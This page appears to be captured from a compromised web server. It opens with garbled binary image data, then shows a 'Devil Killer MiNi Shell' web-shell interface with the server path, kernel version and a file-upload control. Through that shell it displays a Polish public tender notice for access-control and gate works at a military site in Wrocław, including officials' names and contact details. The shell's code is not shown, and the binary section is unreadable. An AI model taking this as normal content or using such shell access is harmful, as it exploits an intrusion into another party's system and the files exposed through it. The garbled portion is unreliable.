JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220210/0005382201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> SVA/Z/K/4620-2/2022: Wykonanie robót branży teletechnicznej, elektrycznej i budowlanej w ramach przebudowy bramy nr 3 i SKD -etap 1 przebudowy ogrodzenia kompl. 2836 8658 i 2900 w CSWIiCh we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AMW SINEVIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142989877</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Paderewskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Dwór Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@amwsinevia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://amwsinevia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SVA/Z/K/4620-2/2022: Wykonanie robót branży teletechnicznej, elektrycznej i budowlanej w ramach przebudowy bramy nr 3 i SKD -etap 1 przebudowy ogrodzenia kompl. 2836 8658 i 2900 w CSWIiCh we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9655db92-899e-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00053822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.amwsinevia.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Część dokumentacji projektowej (Projekt Wykonawczy elektryczno-teletechniczny TSN, SKD) opatrzona jest klauzulą ZASTRZEŻONE. Szczegółowe wymagania w zakresie ochrony informacji niejawnych zawiera załącznik nr 2 do umowy. Zasady udostępnienia dokumentacji niejawnej: dokumentacja niejawna dostępna jest do wglądu w KZB Zachód: Gniezno, ul. Jana III Sobieskiego 20. Dostęp do tej dokumentacji mają tylko osoby, które przedłożą aktualne imienne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez kierownika jednostki organizacyjnej (KJO) lub aktualne poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych oraz aktualne zaświadczenie o odbyciu przeszkolenia w zakresie informacji niejawnych. Wgląd do dokumentacji niejawnej Wykonawca poprzedzi pisemnym wnioskiem do Zamawiającego – do Dyrektora Wydziału Realizacji Inwestycji KZB Zachód – p. Tomasza STARZAKA na adres ul. Jana III Sobieskiego 20, 62-200 Gniezno (dopuszcza się również w formie e-mail: gniezno@amwsinevia.pl). Wraz z wnioskiem należy przesłać kserokopie dokumentów uprawniających do dostępu do informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE dotyczących osób, które chcą zapoznać się z dokumentacją. W sprawie terminu wglądu do dokumentacji należy kontaktować się z Kierownikiem Punktu Ewidencyjnego Panem Andrzejem Gadzińskim, tel. 61 426 34 00 wew 250, e-mail: andrzej.gadzinski@amwsinevia.pl <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.amwsinevia.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W związku z korzystaniem ze środków komunikacji elektronicznej Zamawiający określa niezbędne informacje wynikające z Rozporządzenia Rady Ministrów a dnia 30.12.2020 r. sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie:<br/>1) specyfikacja połączenia - wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej tj.:<br/>- Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, lub lepszej klasy, jeden z systemów operacyjnych - MS Windows 7, Mac Os x<br/>10,4, Linux; lub ich nowsze wersje;<br/>- Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0;- Włączona obsługa JavaScript; - Zainstalowany program Acrobat Reader lub inny odczytujący<br/>pliki pdf.<br/>2) Format przesyłanych danych: a) w zakresie wielkości i formatu plików:<br/>• pliki o wielkości do 50 MB w ogólnie dostępnych formatach. b) w zakresie stosowania<br/>kwalifikowanego podpisu elektronicznego:<br/>• dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>• dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy należy użyć formatu<br/>XAdES. c) w przypadku niekorzystania z kwalifikowanego podpisu elektronicznego, należy używać<br/>podpisu zaufanego lub osobistego.<br/>3) Szyfrowanie i oznaczenie czasu przesyłanych danych, w tym składanych ofert:<br/>• plik załączony przez Wykonawcę na elektronicznej Platformie Zakupowej i zapisany, jest w systemie zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert.<br/>• Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”.<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz<br/>oświadczeń, w tym oświadczenia, o których mowa w Załączniku nr 2, 2a, 3 i 3a do SWZ, odbywa się<br/>przy użyciu środków komunikacji elektronicznej. W tym zakresie Zamawiający korzysta z elektronicznej Platformy Zakupowej pod adresem amwsinevia.eb2b.com.pl.<br/>3. Komunikacja między Zamawiającym aWykonawcami odbywa się wyłącznie za pomocą<br/>elektronicznej Platformy Zakupowej, poprzez wykorzystanie do tego celu zakładki „Pytania/ Informacje” (nie dotyczy składania ofert). W przypadku niestosowania przez Wykonawcę postanowień SWZ w tym zakresie (inny sposób lub narzędzia komunikacji) informacje przekazane przez Wykonawcę w inny sposób mogą nie zostać uwzględnione przez Zamawiającego, co w konsekwencji będzie równoznaczne z uznaniem, że nie zostały przekazane.<br/>4. Ofertę, pod rygorem nieważności, należy sporządzić w formie elektronicznej, tj. opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SVA/Z/K/4620-2/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót branży teletechnicznej, elektrycznej i budowlanej, związanych z przebudową bramy nr 3 i Systemu Kontroli Dostępu CSWIiCh we Wrocławiu, w ramach przebudowy ogrodzenia kompleksów 2836 8658 i 2900 – etap 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów – Wykonawca spełni warunek, jeżeli wykaże się, że posiada aktualną koncesję organu koncesyjnego MSWiA (MSW) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczeń technicznych<br/>2. zdolności technicznej lub zawodowej – Wykonawca spełni warunek jeżeli wykaże się że: <br/>1) wykonał w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie (2) roboty budowlane polegające na wykonaniu systemów alarmowych o wartości minimum 500 000,00 zł brutto każda;<br/>2) dysponuje lub będzie dysponował:<br/> 2.1 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień);<br/> 2.2 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień) oraz posiadająca ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych <br/> 2.3 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień) oraz posiadająca ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych <br/> 2.4 co najmniej trzema (3) osobami skierowanymi do realizacji zamówienia tj. posiadających (każdy z nich z osobna): zaświadczenie o wpisie na listę kwalifikowanego pracownika zabezpieczenia technicznego wraz z legitymacją kwalifikowanego pracownika zabezpieczenia technicznego, świadectwo ukończenia kursów w zakresie instalowania i konserwacji systemów technicznych stopni 1-4 klas SA1-SA4, świadectwo kwalifikacyjne E (eksploatacja), ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych, a ponadto co najmniej jeden z powyższych instalatorów musi posiadać świadectwo ukończenia kursu w zakresie projektowania systemów zabezpieczeń technicznych stopni 1-4 klas SA1-SA4 oraz co najmniej jeden z powyższych instalatorów musi posiadać świadectwo kwalifikacyjne D (dozór);<br/> 2.5 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia pełniącą funkcję Kierownika Jednostki Organizacyjnej zgodnie z art. 2 ust.14 ustawy z dn. 05.08.2010 o ochronie informacji niejawnych;<br/> 2.6 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia pełniącą funkcję Pełnomocnika ds. Ochrony Informacji Niejawnych na zasadach określonych w art. 15 Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2019 r. poz. 742), posiadającego aktualne poświadczenie bezpieczeństwa dopuszczające do dostępu do informacji niejawnych o klauzuli co najmniej „POUFNE” oraz aktualne zaświadczenie potwierdzające odbycie szkolenia dla pełnomocników ochrony i ich zastępców oraz kandydatów na pełnomocników ochrony lub ich zastępców, przeprowadzone przez ABW lub SKW;<br/> 2.7 co najmniej jedną (1) osobą skierowaną do realizacji zamówienia pełniącą funkcję Kierownika kancelarii tajnej lub Kierownika komórki organizacyjnej innej niż kancelaria tajna (kierownik punktu ewidencyjnego) posiadającego ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej oraz aktualne zaświadczenie stwierdzające odbycie przeszkolenia w zakresie ochrony informacji niejawnych;<br/>3) posiada lub dysponuje (w przypadku umowy z podwykonawcą): kancelarią tajną lub kancelarią inną niż kancelaria tajna przygotowaną do przechowywania informacji niejawnych o klauzuli ZASTRZEŻONE. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem oferty najkorzystniejszej wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących dokumentów:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art.109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; lub Zamawiający nie wezwie jeżeli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej,<br/>powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 1, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis pkt 2 w zakresie terminu wystawienia dokumentu stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem oferty najkorzystniejszej wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących dokumentów:<br/>1)	aktualnej koncesji organu koncesyjnego MSWiA (MSW) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczeń technicznych<br/>2)	wykazu robót budowlanych obejmujących wykonanie:<br/>co najmniej dwie (2) roboty budowlane polegające na wykonaniu systemów alarmowych o wartości minimum 500 000,00 zł brutto każda, wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, przedmiotu, dat i miejsca wykonania oraz podmiotów, na rzecz których roboty zostały wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonana należycie, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - wzór wykazu robót stanowi załącznik nr 5 do SWZ.<br/>3)	wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, tj.:<br/>3.1 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień);<br/>3.2 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień) oraz posiadająca ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych;<br/>3.3 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń (wymagane minimum 2 lata doświadczenia na stanowisku kierownika budowy lub robót od czasu uzyskania uprawnień) oraz posiadająca ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych;<br/>DOKOŃCZENIE W SEKCJI IX - Pozostałe 